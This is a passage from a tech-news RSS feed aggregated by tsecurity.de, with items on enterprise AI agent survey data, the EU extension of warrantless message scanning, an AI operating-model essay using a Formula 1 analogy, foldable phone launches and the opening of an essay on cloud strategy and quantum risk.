them watched it happen more than once.</p><p>Most enterprise companies are fixing this, even though they’ve moved forward with agent deployment already: 25% already run a governed semantic layer, or one governed definition of the business that every AI reads from, in production. However, 34% are still building one, and 41% haven't started. The takeaway: Govern the definitions your agents answer from, metrics and entities first, before scaling the agents that depend on them.</p><h2>The quarter where agent technology “portability” became a priority</h2><p>One more shift is worth reporting with its limits stated plainly. In our spring orchestration survey wave, the top concern about provider-controlled orchestration was security and permissioning limits (32%). By June, vendor lock-in led at roughly a third, with security limits at 28%. </p><p>Those are two snapshots one quarter apart, and here’s one possible explanation for why portability became a top issue for enterprises. Our June survey went into market after a June 12 U.S. Commerce Department <a href="https://venturebeat.com/orchestration/enterprises-lost-claude-fable-5-for-a-few-weeks-new-data-shows-two-thirds-had-already-built-their-hedge">export order took Anthropic's Claude Fable 5 offline</a> for enterprises for roughly three weeks. Meanwhile, Chinese company Z.ai <a href="https://venturebeat.com/technology/z-ais-open-weights-glm-5-2-beats-gpt-5-5-on-multiple-long-horizon-coding-benchmarks-for-1-6th-the-cost">released GLM-5.2's open weights</a> under an MIT license on June 16 at roughly one-sixth of GPT-5.5's price; and Tencent's <a href="https://venturebeat.com/technology/tencents-apache-licensed-hy3-takes-on-glm-5-2-at-half-the-size-and-wins-everywhere-except-coding">Hy3 arrived</a> July 6 under Apache 2.0; and OpenAI <a href="https://venturebeat.com/technology/openai-unveils-gpt-5-6-sol-terra-and-luna-models-but-only-accessible-to-limited-preview-partners-for-now-per-us-gov">previewed GPT-5.6</a> on June 26 to a small group of government-vetted partners, opening it broadly on July 9 after the government's review cleared. The open-weight releases in particular promise enterprises more control over their agents, and while we haven't established a causal link here, the timing is worth noting.</p><p>The posture data matches the mood: 51% now expect their primary control plane for enterprise agents to be hybrid — provider-native plus external orchestration — by the end of 2026, up from 34% in the spring survey wave. Enterprises reporting that they rely purely on provider-managed agent services fell from 12% to 7%.</p><h2>Five layers, no incumbents, 12 months</h2><p>The synthesis across all five surveys reveals a huge “buying” window. In each of the five control layers, 57% to 64% of enterprises plan to switch or add vendors within 12 months — 64% in infrastructure and in evaluations, 59% in agent security, 57% in retrieval and context — and 26% to 38%, depending on the layer, plan to move within a quarter. No layer has an established incumbent: The most common evaluation tooling is the model provider's built-in evals, tied with no dedicated tooling at all (17% each); 82% of respondents name provider-native or hyperscaler controls as their primary agent security layer; and provider-native retrieval leads the context technology layer (RAG, etc) as well. </p><p>Most enterprises are defaulting today to the built-in tools that ship with the big AI platforms they already use: Anthropic, OpenAI, Google, Microsoft, and AWS. That holds true across every one of these agentic technology layers: enterprises are looking to their primary cloud and model providers to supply the guardrails, evaluations, and retrieval solutions already bundled into those providers' offerings.</p><p>Those defaults are winning on convenience, and they're also what the coming spending decisions will test. The survey didn't ask which direction that money moves — toward the platforms' built-in tools or toward the specialists challenging them — which is exactly why every contract in these five layers is worth watching over the next four quarters.</p><p>The Q3 survey wave will measure whether the enterprises made good on these budget plans: whether their agents gained scoped identities, whether evaluations got tested against production outcomes, whether GPU utilization rose, and whether the semantic layers under construction shipped.</p><p><i>VentureBeat will release the full Q2 reports across all five VB Pulse trackers at </i><a href="https://luma.com/92nbdnnx?utm_source=LI&amp;utm_campaign=mmpost2"><i>VB Transform</i></a><i>, July 14–15 at Hotel Nia in Menlo Park, where we convene enterprise technical leaders building autonomous agents in production. </i></p><p><i>Disclosure: VentureBeat produces both this research and VB Transform</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[EU extends mass scanning of messages without a warrant]]></title>
<description><![CDATA[Members of the European Parliament (MEPs) have failed to block a proposal extending the mass scanning of private communications, a measure they have previously rejected twice.



This time too, more votes were cast against the proposal than in favor, but due to the absence of numerous MEPs on the...]]></description>
<link>https://tsecurity.de/de/3660067/it-security-nachrichten/eu-extends-mass-scanning-of-messages-without-a-warrant/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660067/it-security-nachrichten/eu-extends-mass-scanning-of-messages-without-a-warrant/</guid>
<pubDate>Fri, 10 Jul 2026 16:54:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Members of the European Parliament (MEPs) have failed to block a proposal extending the mass scanning of private communications, a measure they have previously rejected twice.</p>



<p>This time too, more votes were cast against the proposal than in favor, but due to the absence of numerous MEPs on the eve of the summer recess, the motion to reject did not attain the necessary absolute majority. The proposal passed by default.</p>



<p>Similarly, an amendment to require warrants for the scanning received more votes in favor than against, but failed to attain the necessary absolute majority to pass.</p>



<p>The so-called Chat Control 1.0 law will now be extended through 2028.</p>



<p>According to its supporters, the measure can be seen as a vital component in the fight against the sexual abuse of children, while opponents see it as a move to restrict privacy.</p>



<p>This has been a long-running battle within the European Union. Last November, the European Commission <a href="https://www.csoonline.com/article/4097728/eu-chat-control-proposals-should-be-red-flag-to-businesses-everywhere.html">put a halt to proposals for large-scale monitoring</a> and proposed a voluntary approach. This has now changed. Under the new measure, service providers will be able to scan private messages without a warrant. This affects direct messages on platforms including Discord, Skype, Instagram, Snapchat, and Xbox, as well as emails sent via Google’s Gmail and Apple’s iCloud. Encrypted services like WhatsApp remain unaffected.</p>



<p>“Today’s vote on the interim regulation was a setback, but the political battle over the permanent ‘Chat Control 2.0’ is just getting started. The resistance we saw in Parliament today was so strong that finding a majority for permanent, suspicionless mass scanning in future negotiations is a complete pipe dream,” <a href="https://www.patrick-breyer.de/en/eu-parliament-greenlights-chat-control-1-0-breyer-our-children-lose-out/" target="_blank" rel="noreferrer noopener">wrote Patrick Beyer</a>, a long-standing critic of the proposal and a former MEP himself.</p>



<p>In November, he warned that enterprises could be affected by the measure. “For a corporation, a ‘false positive’ could mean that confidential internal documents, code, or strategic plans are flagged and sent to external authorities or police forces without the company’s knowledge.”</p>



<p>Discussions on a permanent solution to the issue are continuing, with some firmly entrenched views on both sides. “The core dispute between the EU Parliament, member state governments, and the EU Commission remains the scanning of private chats: should it be indiscriminate, or targeted at criminal suspects?” wrote Beyer.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operate like a Formula 1 team: The new AI operating model]]></title>
<description><![CDATA[It is lap 47 of 57.



Before the race began, the team had already processed gigabytes of race data, simulations, tire models, weather forecasts, competitor tendencies and scenario plans. But on the pit wall, there is tension.



The race leader’s tires are degrading faster than predicted. A riva...]]></description>
<link>https://tsecurity.de/de/3659196/it-security-nachrichten/operate-like-a-formula-1-team-the-new-ai-operating-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659196/it-security-nachrichten/operate-like-a-formula-1-team-the-new-ai-operating-model/</guid>
<pubDate>Fri, 10 Jul 2026 11:07:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It is lap 47 of 57.</p>



<p>Before the race began, the team had already processed gigabytes of race data, simulations, tire models, weather forecasts, competitor tendencies and scenario plans. But on the pit wall, there is tension.</p>



<p>The race leader’s tires are degrading faster than predicted. A rival has just pitted for fresh tires and is closing the gap by three-tenths of a second per lap. The lead may not hold. In short, the race is not going to plan.</p>



<p>A strategist now has only seconds to synthesize live telemetry, competitor data, weather projections, tire inventory, track position and race simulations into one call that could determine the outcome.</p>



<p>They do not have those seconds because they are simply fast. They have them because the entire system behind the decision was designed that way: the data architecture, simulation models, communication protocols, decision rights, scenario playbooks and feedback loops all work together to compress complexity into a clear decision window.</p>



<p>What if this is not just a racing story? What if it is also a blueprint for how the best enterprises will operate in the AI era?</p>



<p>This builds on a broader shift I’ve described as the <a href="https://url.usb.m.mimecastprotect.com/s/d_0XCXYGMGtpp756C6fncW3mhs?domain=cio.com" target="_blank" rel="nofollow">intent-driven future of work</a>, where enterprise work begins less with navigating systems and more with expressing outcomes, context and intent.</p>



<p>The AI advantage will not belong to companies with the most tools. It will belong to companies that redesign how work senses, decides, acts and learns.</p>



<h2 class="wp-block-heading">AI isn’t just a faster engine</h2>



<p><a href="https://url.usb.m.mimecastprotect.com/s/cf3ZCYVJMJcGGo10tGh5cxi2wD?domain=cio.com" target="_blank" rel="nofollow">The popular story about Formula 1 is usually about speed or the quality of the driver</a>. The fastest car with the most powerful engine with the driver with the quickest reflexes will win. But anyone who follows the sport closely knows that raw speed is only the starting point.</p>



<p>Every car on the track is fast. Speed gets you into the race. It does not guarantee you a win.</p>



<p>The teams that win consistently do so because of the quality of the system surrounding the car. They connect telemetry, simulations, strategy, engineering, pit operations, driver judgment and real-time learning into one high-performance operating model.</p>



<p>Every part of that operating model matters. But the best individual part alone does not win the race.</p>



<p>Enterprise AI strategy is at risk of making the same mistake that would keep an F1 team stuck in the middle of the pack: investing heavily in the engine while underinvesting in the entire race system.</p>



<p>I see enterprising investing in more copilots, more agents, more dashboards, more tools and ultimately more automation. </p>



<p>The AI systems perform their tasks at unprecedented speed. But the business outcomes do not change. In many ways, <a href="https://url.usb.m.mimecastprotect.com/s/Om9vCZZKWKuOOn4mfKiwcBwunD?domain=deloitte.wsj.com" target="_blank" rel="nofollow"><strong>AI is becoming a new operating system of work</strong></a> not because it replaces every application, but because it changes how intent, context, workflow and execution come together.</p>



<p>That is the gap many organizations are now facing. They have access to powerful AI capabilities, but they have not yet redesigned the operating model around those capabilities. The result is faster individual task execution inside disconnected systems, fragmented workflows and unclear accountability. In fact, a recent McKinsey report found that <a href="https://url.usb.m.mimecastprotect.com/s/q5DRC1Vo9ocvvwzjFXsKcVUXck?domain=mckinsey.com" target="_blank" rel="nofollow">88% use AI but two-thirds haven’t scaled it</a>.</p>



<p>The next phase of AI value will not come from simply adding more AI tools. It will come from redesigning how the enterprise senses, decides, acts and learns.</p>



<h2 class="wp-block-heading">The enterprise has too many disconnected signals</h2>



<p>Most enterprises do not suffer from a lack of signals. In fact, they are everywhere across the business.</p>



<p>Customer intent signals, campaign performance data, product usage patterns, sales activity, support interactions, contract information, financial indicators, employee sentiment, security events and operational metrics already exist throughout an organization.</p>



<p>The problem is signal fragmentation.</p>



<p>The average knowledge worker has become the integration layer of the enterprise. They move between CRM, marketing automation, analytics dashboards, spreadsheets, collaboration tools, support systems, workflow platforms and financial reports. Then they manually assemble context that no single system provides.</p>



<p>They do this to answer questions that should take seconds, not hours.</p>



<ul class="wp-block-list">
<li>Which customer needs attention?</li>



<li>Which opportunity is at risk?</li>



<li>Which process is slowing down execution?</li>



<li>Which signal should trigger action?</li>



<li>Which decision needs human judgment?</li>
</ul>



<p>In Formula 1 terms, this would be like a pit crew strategist having to call five different team members to gather tire degradation data, track conditions, competitor lap times, fuel load, weather forecasts and pit stop windows before making a race-defining call.</p>



<p>The data exists. But the latency in accessing, interpreting and acting on it makes it less valuable at the moment of decision.</p>



<p>That is the signal-to-action gap. And closing that gap is one of the most important opportunities in enterprise AI.</p>



<h2 class="wp-block-heading">The new operating model: Sense, decide, act, learn</h2>



<p>The AI-native enterprise needs to operate more like a Formula 1 team: continuously sensing, deciding, acting and learning.</p>



<ul class="wp-block-list">
<li><strong>Sense</strong> is the foundation. It means connecting the right signals across systems, workflows, customers, employees and operations into a layer that AI can reason across. This is not just reporting on the past. It is creating the ability to understand what is happening now and anticipate what is likely to happen next.</li>



<li><strong>Decide</strong> is where AI intelligence and human judgment come together. AI can surface context, detect patterns, model options and recommend actions. Humans bring business judgment, ethical reasoning, organizational context and accountability. The quality of this partnership depends on the quality of the signals and context available to both.</li>



<li><strong>Act</strong> is where intelligence turns into execution. The goal is not another recommendation sitting in a dashboard. The goal is a workflow that triggers the right action, with the right controls, at the right time.</li>



<li><strong>Learn</strong> is where the operating model becomes a competitive advantage. Every action should generate feedback. Every outcome should improve the next recommendation. Every workflow should become smarter over time.</li>
</ul>



<p>In Formula 1, every lap creates learning. Tire wear, track temperature, driver feedback, competitor movement and weather changes continuously reshape strategy.</p>



<p>The enterprise needs the same kind of learning loop.</p>



<h2 class="wp-block-heading">Semantic intelligence is the missing layer</h2>



<p>To close the signal-to-action gap, enterprises need more than data integration. They need semantic intelligence.</p>



<p>Semantic intelligence is what helps AI understand enterprise meaning. It connects business language, customer context, workflow relationships, policies, roles, systems and outcomes so AI can reason across the business, not just retrieve information from systems.</p>



<p>A customer health score is not just a number. Its meaning depends on product usage, renewal timing, support history, stakeholder engagement, commercial value, sentiment, implementation milestones and prior interventions.</p>



<p>A delayed workflow is not just a status update. It may signal unclear ownership, missing approvals, poor handoffs, missing context, poor data quality or a decision that needs escalation.</p>



<p>A sales opportunity at risk is not just a CRM field. It may reflect adoption gaps, customer sentiment, usage decline, executive sponsor changes, pricing friction, support issues or service delivery risk.</p>



<p>Without semantic intelligence, AI can summarize what happened. With semantic intelligence, AI can understand what matters, why it matters, who needs to act and what action is most likely to improve the outcome.</p>



<p>This is where enterprise AI value compounds. Foundation models will become broadly available. The model itself will not be the moat. The moat will be enterprise context, semantic intelligence, workflow intelligence, governance and learning loops.</p>



<h2 class="wp-block-heading">Redesign work before automating it</h2>



<p>There is a warning in the Formula 1 analogy that deserves attention: adding more power to a poorly designed system does not make it high performing.</p>



<p>The same is true for enterprise AI. Adding AI to a broken workflow does not fix the workflow. It just compounds the dysfunction.</p>



<p>If the data is fragmented, AI will produce incomplete recommendations confidently. If governance is disconnected from execution, AI can scale risk as quickly as it scales productivity.</p>



<p>The question teams ask shouldn’t be, “Where can we insert AI into this existing process?”</p>



<p>The better question is, “If we were designing this work from scratch, knowing what AI now makes possible, how should it operate?”</p>



<p>This pushes leaders to clarify where work starts, what signals matter, which decisions should be automated, where human judgment is required, what controls must be embedded, how outcomes should be measured and how the system should learn.</p>



<p>This is where CIOs, CTOs and technology leaders have an expanded role. AI transformation is no longer only about deploying technology. It is about redesigning how the enterprise works.</p>



<h2 class="wp-block-heading">Context becomes the differentiator</h2>



<p>In a world where every enterprise can access powerful models, context becomes the differentiator.</p>



<p>The winning organizations will not be the ones with the most AI tools. They will be the ones with the strongest enterprise context and the clearest path from signal to action.</p>



<p>That context includes customer history, product usage, workflow patterns, decision history, business rules, governance standards, risk boundaries, organizational knowledge and outcome feedback.</p>



<p>It also includes knowing what happened after a decision was made. Did the action improve retention? Did it accelerate a deal? Did it reduce cycle time? Did it improve customer experience? Did it create risk? Did it scale?</p>



<p>Without that feedback, AI remains a recommendation layer. With it, AI becomes part of a learning operating model.</p>



<p>This is why the most important AI investments are not always the most visible ones. Data quality, identity, access, governance, workflow integration, observability, semantic models, feedback loops and change management may not sound as exciting as the latest AI agent. But they are what allow AI to create durable enterprise value.</p>



<h2 class="wp-block-heading">The CIO as architect of the race system</h2>



<p>The CIO’s role is evolving from technology operator to architect of the enterprise race system.</p>



<p>That means connecting strategy, workflows, data, platforms, governance, security, talent and execution into an operating model that can move faster without losing control. The CIO’s job is no longer just to provide platforms. It is to design the conditions where intelligence can move safely and effectively through the enterprise with the right context, controls, accountability and feedback loops.</p>



<p>Business teams need the ability to experiment and innovate. But they need to do so within clear standards for data access, identity, security, privacy, model usage, auditability, human oversight and business accountability.</p>



<p>This is the balance every enterprise needs to strike: speed with control.</p>



<p>The future is federated innovation with centralized guardrails. It is an enterprise operating model where more people can create value with AI, but within a trusted architecture that protects the company, the customer and the quality of decisions.</p>



<p>The companies that pull ahead in the next decade will not be the ones that deployed AI first or assembled the largest portfolio of tools.</p>



<p>They will be the ones who built the enterprise equivalent of a winning Formula 1 race system: a connected operating model.</p>



<p>In Formula 1, the gap between the team that wins the championship and the team that finishes fourth is often measured in tenths of a second per lap. Compounded over a race distance, those tenths become decisive.</p>



<p>The same dynamic is emerging in enterprise AI.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Produktion lahmgelegt: Cyberangriff treibt Textilbetrieb in die Insolvenz - Golem.de]]></title>
<description><![CDATA[E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... SecuritySicherheitslückeCybercrimeWirtschaftUnternehmen ...]]></description>
<link>https://tsecurity.de/de/3658643/it-security-nachrichten/produktion-lahmgelegt-cyberangriff-treibt-textilbetrieb-in-die-insolvenz-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658643/it-security-nachrichten/produktion-lahmgelegt-cyberangriff-treibt-textilbetrieb-in-die-insolvenz-golemde/</guid>
<pubDate>Fri, 10 Jul 2026 05:53:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[E-Learning: <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... <b>Security</b>SicherheitslückeCybercrimeWirtschaftUnternehmen ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Poll: With Galaxy and Pixel Price Increases on Horizon, Are You Upgrading?]]></title>
<description><![CDATA[While companies like Samsung report 1800% profit jumps, the latest intel suggests that consumers will see price increases on essentially all new phones (and wearables) due to a supposed RAM shortage. This poses a question. With prices going up, and consumers feeling the squeeze nearly everywhere ...]]></description>
<link>https://tsecurity.de/de/3657892/it-nachrichten/poll-with-galaxy-and-pixel-price-increases-on-horizon-are-you-upgrading/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657892/it-nachrichten/poll-with-galaxy-and-pixel-price-increases-on-horizon-are-you-upgrading/</guid>
<pubDate>Thu, 09 Jul 2026 19:47:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>While companies like Samsung report 1800% profit jumps, the latest intel suggests that consumers will see price increases on essentially all new phones (and wearables) due to a supposed RAM shortage. This poses a question. With prices going up, and consumers feeling the squeeze nearly everywhere else in life, will 2026 be the year you...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/09/poll-with-galaxy-and-pixel-price-increases-on-horizon-are-you-upgrading/">Poll: With Galaxy and Pixel Price Increases on Horizon, Are You Upgrading?</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicherheit: Metas Smart Glasses schalten Kamera bei Manipulation aus - Golem.de]]></title>
<description><![CDATA[... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ... SecurityMetaProject GlassSmartglassStalker. Weitere interessante ...]]></description>
<link>https://tsecurity.de/de/3655399/it-security-nachrichten/sicherheit-metas-smart-glasses-schalten-kamera-bei-manipulation-aus-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655399/it-security-nachrichten/sicherheit-metas-smart-glasses-schalten-kamera-bei-manipulation-aus-golemde/</guid>
<pubDate>Wed, 08 Jul 2026 22:22:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ... <b>Security</b>MetaProject GlassSmartglassStalker. Weitere interessante ...]]></content:encoded>
</item>
<item>
<title><![CDATA[The $2,000 club: Apple, Samsung, Google bet on foldables]]></title>
<description><![CDATA[Apple, Samsung, and Google are all expected to introduce their takes on folding smartphones in the coming weeks. 



All three competitors work together on some things; Samsung allegedly makes displays for iPhone; Google makes an OS for Samsung; and Apple works with Google Gemini for AI. That pro...]]></description>
<link>https://tsecurity.de/de/3654849/it-nachrichten/the-2000-club-apple-samsung-google-bet-on-foldables/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654849/it-nachrichten/the-2000-club-apple-samsung-google-bet-on-foldables/</guid>
<pubDate>Wed, 08 Jul 2026 18:19:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Apple, Samsung, and Google are all expected to introduce their takes on folding smartphones in the coming weeks. </p>



<p>All three competitors work together on some things; Samsung allegedly makes displays for iPhone; Google makes an OS for Samsung; and Apple works with Google Gemini for AI. That proximity suggests that we might experience some synchronicity between these devices when they finally arrive.</p>



<h2 class="wp-block-heading"><strong>Samsung and Google move first — but September belongs to Apple</strong></h2>



<p><em><a href="https://www.bloomberg.com/news/articles/2026-07-07/samsung-to-get-jump-on-apple-s-first-foldable-launch-with-galaxy-fold-8-july-22" target="_blank" rel="noreferrer noopener">Bloomberg</a></em> agrees: the publication claims Samsung’s forthcoming Galaxy Unpacked event in London on July 22 will feature the Galaxy Z Fold 8, which will have a short, wide design “that resembles Apple Inc.’s planned folding iPhone.”</p>



<p>It is <a href="https://tech.sportskeeda.com/mobiles/galaxy-z-fold-8-series-prices-leaked-here-s-much-cost" target="_blank" rel="noreferrer noopener">expected to cost around $1,999</a> for the 256GB model. The late July introduction is widely seen as an attempt to steal a little thunder from the upcoming launch of the iPhone Fold/Ultra, Apple’s first foldable device.</p>



<p>Google is also chasing the looming Apple thundercloud with its own “<a href="https://arstechnica.com/gadgets/2026/07/googles-pixel-11-launch-event-is-set-for-august-12-with-possible-price-increases/" target="_blank" rel="noreferrer noopener">Made by Google</a>” event in New York on Aug. 12. This is expected to be a Pixel family update, likely including a successor to the Pixel 11 Pro Fold. Leaks suggest these devices will have more RAM (for AI), more storage — with a 256GB minimum — and be priced at an <a href="https://www.androidauthority.com/google-pixel-11-storage-colors-price-leak-3684868/" target="_blank" rel="noreferrer noopener">estimated $1,999</a> – or <a href="https://9to5google.com/2026/07/07/pixel-11-price-128gb-release-date-leak/" target="_blank" rel="noreferrer noopener">maybe even more</a>.</p>



<p>Both of these devices will be great. Both will likely be compelling; but what we don’t know yet is how the decade or so Apple has spent designing and developing its own folding smartphones will crystallize into the final result. </p>



<h2 class="wp-block-heading"><strong>A decade in development, but will it blend?</strong></h2>



<p>Apple has its reputation on the line – will its phone stand out for its combination of high-tech and high design, or will the company fail in its bid to stand apart? We’ll find out in September when Apple’s folding smartphone finally appears, and the oxygen once again starts circulating around this part of the room.</p>



<p>We do know that the iPhone Ultra has entered mass production, with <em><a href="https://www.macrumors.com/2026/07/08/foldable-iphone-ultra-mass-production-no-delay/" target="_blank" rel="noreferrer noopener">MacRumors</a></em> seemingly rebutting <a href="https://www.computerworld.com/article/4193280/forget-the-hype-iphone-ultra-scarcity-will-tell-the-story.html">recent claims by Ming-Chi Kuo</a> that the device might ship later than expected and be in <a href="https://www.computerworld.com/article/4193280/forget-the-hype-iphone-ultra-scarcity-will-tell-the-story.html">short supply once it appears</a>. Citing Chinese supply chain sources, the report says manufacturing has begun. Other reports indicate Apple has <a href="https://www.applemust.com/apple-to-sell-10m-iphone-ultra-grab-29-share/" target="_blank" rel="noreferrer noopener">increased initial manufacturing orders</a> to 10 million units. Somewhere in between the truth lies.</p>



<p>The iPhone Ultra is <a href="https://www.applemust.com/what-we-think-we-know-about-iphone-ultra/" target="_blank" rel="noreferrer noopener">expected to be a book-style foldable</a> with a 7.8-in. inner display and a 5.5-in. cover display, Touch ID, an Apple C2 modem and an A20 processor. It will run iOS 27, which has already been found to be capable of changing display layout and resolution to seamlessly switch between different views; moving from the outer to the inner display should seem almost instantaneous, with smooth transitions between both states. </p>



<h2 class="wp-block-heading"><strong>The hinges need to do the talking</strong></h2>



<p>Apple has paid particular attention to the hinge design, which is thought to be near invisible to the eye and extremely robust. (It needs to be robust; the hinge will inevitably be put to some very tough tests by hungry vlogging tech influencers everywhere.)</p>



<p>Those same influencers will also be putting Siri AI to the test, with most potential customers very curious about the extent to which Apple Intelligence can turn the folding iPhone into a viable replacement for Macs or iPads. What happens when you use an iPhone Ultra with an external mouse and keyboard, for example? Will competing devices match the user experience for productive tasks?</p>



<p>At $2,000 a pop, a lot of potential customers for any of these foldable devices will be looking for a solution that ticks more boxes than simply being a giant smartphone. They will certainly want the luxury finish we can expect in all three devices, but they will also be hoping for a tool fit for a range of use cases smartphones don’t generally meet. </p>



<p>Samsung’s existing Fold range, for example, is celebrated for its advanced multitasking features and media content and consumption features, even as its ability to connect to a monitor, keyboard, and mouse (<a href="https://www.samsung.com/us/support/owners/app/samsung-dex" target="_blank" rel="noreferrer noopener">Samsung DeX</a>) makes it a convenient PC replacement.</p>



<h2 class="wp-block-heading"><strong>Resetting the high-end smartphone price point</strong></h2>



<p>You can expect much the same from all three devices: a focus on display resolution, color gamut, brightness and screen refresh rates. But for all three, the really critical point will be the resilience of the hinge. Because once the novelty of the fold fades, the winner will be the one that succeeds in becoming something more useful than the smartphone we already know. </p>



<p>In the end, these things must deliver more, not less, if they are to persuade consumers to reset their price-driven comfort zones. All of the manufacturers have a <a href="https://www.applemust.com/ram-ageddon-continues-samsung-eyes-another-20-dram-hike/" target="_blank" rel="noreferrer noopener">vested interest</a> in driving shoppers to spend even more money on their devices. </p>



<p><em>Join me on social media at </em><a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener"><em>BlueSky</em></a><em>,  </em><a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener"><em>LinkedIn</em></a><em>, or </em><a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener"><em>Mastodon</em></a><em>,and do please subscribe to </em><a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener"><em>The Core</em></a><em> for your daily collection of human-curated Apple News lovingly assembled by yours truly.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI changed our cloud strategy. Quantum changes the questions behind it]]></title>
<description><![CDATA[The strangest thing about cloud strategy is how confident it looks in PowerPoint and how nervous it feels in real life.



I’ve sat in rooms where the cloud slide looked clean enough to frame. Public cloud here. Private cloud there. Hybrid for the awkward middle child. Multi-cloud for resilience,...]]></description>
<link>https://tsecurity.de/de/3654083/it-security-nachrichten/ai-changed-our-cloud-strategy-quantum-changes-the-questions-behind-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654083/it-security-nachrichten/ai-changed-our-cloud-strategy-quantum-changes-the-questions-behind-it/</guid>
<pubDate>Wed, 08 Jul 2026 13:08:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The strangest thing about cloud strategy is how confident it looks in PowerPoint and how nervous it feels in real life.</p>



<p>I’ve sat in rooms where the cloud slide looked clean enough to frame. Public cloud here. Private cloud there. Hybrid for the awkward middle child. Multi-cloud for resilience, bargaining power and the faint hope that no single vendor would ever own our sleep.</p>



<p>Then AI arrived.</p>



<p>At first, it looked like another conversation about workload. Bigger compute. More storage. Faster experiments. Some awkward cost questions. Nothing we couldn’t absorb with a thicker roadmap.</p>



<p>Then the bills landed. The data moved in odd ways. Teams built things before governance could find its shoes. Vendors became more central than anyone had admitted.</p>



<p>The old cloud strategy didn’t collapse. It blushed. AI exposed the assumptions beneath it.</p>



<p>Now, quantum changes something deeper. It asks whether the decisions behind the workload can survive time, secrecy, suppliers, weak evidence and uncertainty.</p>



<p>That’s a much less comfortable meeting.</p>



<h2 class="wp-block-heading">Cloud strategy was built for workloads we thought we understood</h2>



<p>For years, cloud strategy was a sensible debate about location, cost, control and speed. Public cloud for scale. Private cloud for sensitive workloads. Hybrid cloud for compromise. Multi-cloud for resilience, negotiation or, if we’re being honest, organizational politics with a nice diagram.</p>



<p>The logic was sound. Move faster. Cut heavy infrastructure spend. Improve recovery. Give developers what they need before they grow old waiting for a server. It worked because the work behaved in familiar ways. Systems had owners. Costs had patterns. Data had borders, or at least we pretended it did.</p>



<p>The question was simple: Where should this workload live? That question still matters. But it no longer carries enough weight.</p>



<p>AI changed that. AI changed the pattern, not just the platform AI didn’t politely join the cloud strategy. It wandered through the house, opened every cupboard and asked why the plumbing sounded tired.</p>



<p>The first shock was demand.</p>



<p>Traditional systems consume resources in ways you can usually model. AI workloads behave differently. Training, testing, inference and data processing can spike, pause, restart and spread before anyone has agreed on who owns the meter.</p>



<p>Cloud cost control used to ask a billing question, “How much will we use?” AI asks an operating question: “Who is allowed to create demand, at what scale, for what purpose and with whose approval?”</p>



<p>The second shock was data.</p>



<p>AI does more than store data. It chews it, reshapes it, remembers parts of it, produces new versions of it and leaves traces in places people forget to check. Prompts, logs, embeddings, model outputs, copied files and forgotten notebooks can become quiet risk pockets.</p>



<p>A cloud strategy that only asks where data sits misses how data behaves.</p>



<p>The third shock was supplier dependency.</p>



<p>Many firms thought they had a cloud strategy. AI revealed they had a supplier dependency strategy wearing a cloud badge. GPUs, model platforms, managed services, specialist APIs and third-party tools became central to delivery.</p>



<p>AI compressed the distance between idea and exposure. A team could test, connect and release faster than governance could form a working group. I say that with affection. I’ve seen working groups age in dog years.</p>



<p>Cloud strategy had become a test of decision speed, risk appetite, financial discipline and data control. It now goes beyond architecture.</p>



<p>Then quantum changed the clock.</p>



<h2 class="wp-block-heading">Quantum changes the time horizon</h2>



<p>Quantum risk often gets dumped into the cryptography drawer. That is understandable. It is also dangerous.</p>



